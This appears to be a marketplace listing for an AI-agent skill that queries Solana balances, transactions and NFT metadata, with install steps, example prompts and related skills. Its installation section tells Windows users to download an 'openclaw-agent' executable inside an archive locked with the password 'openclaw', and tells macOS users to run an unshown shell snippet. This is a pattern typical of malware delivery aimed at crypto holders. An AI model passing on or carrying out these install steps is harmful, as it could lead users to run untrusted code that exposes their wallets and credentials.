solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Learn to manage your Solana assets, check balances, track NFT metadata, and monitor transactions using the OpenClaw Solana AI skill. Simple installation and usage guide.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-ydqh7What This Skill Does
The Solana skill for OpenClaw AI provides an integrated interface to interact directly with the Solana blockchain. By acting as a wrapper for the official Solana CLI and auxiliary tools like Metaboss and spl-token, this skill enables users to query real-time blockchain data effortlessly. It supports balance checks, detailed account inspection, transaction history retrieval, and comprehensive NFT metadata analysis. It serves as a command-line bridge between your AI agent and the Solana ledger, allowing for rapid auditing of Phantom or Solflare addresses, monitoring of staking positions, and deep-dives into SPL token holdings.
Installation
To utilize this skill, you must ensure the underlying environment is configured correctly. First, install the skill via the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/solana-ydqh7. Crucially, you must install the openclaw-agent utility. For Windows users, download the provided executable from the official repository and extract it using the password 'openclaw'. macOS users should utilize the provided shell script snippet to prepare the environment. Additionally, ensure the standard Solana CLI suite is installed on your system path. Configure your preferred RPC node using solana config set --url <RPC_URL> to ensure accurate data retrieval.
Use Cases
This skill is perfect for developers, power users, and crypto-enthusiasts who need to automate Solana research. Use it to monitor wallet balances for incoming transfers, verify the metadata of specific NFT mints using Metaboss, or track the transaction history of high-activity accounts for auditing purposes. It is also an essential tool for developers testing smart contract interactions on Devnet or monitoring live transactions on the Mainnet beta.
Example Prompts
- "Check the current SOL balance and recent transaction history for this address: 4nQvG93vjJ3QcT1G5vXfWj1XG8M5pY4qGvXq."
- "Retrieve the metadata for NFT mint address G3Pq... and show me the SPL token holdings for my account."
- "Set the RPC to mainnet and monitor the balance of my wallet address every 5 seconds until I say stop."
Tips & Limitations
Always ensure your openclaw-agent process is active before executing commands, as the skill relies on this bridge for connectivity. When querying large amounts of transaction data, use the --limit flag to avoid excessive output. Note that this tool is read-heavy; for complex transaction signing or state-changing operations, you should proceed with caution and verify all network configurations. For privacy, be mindful of which RPC endpoints you utilize, as public RPCs may log your request metadata.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-ydqh7": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.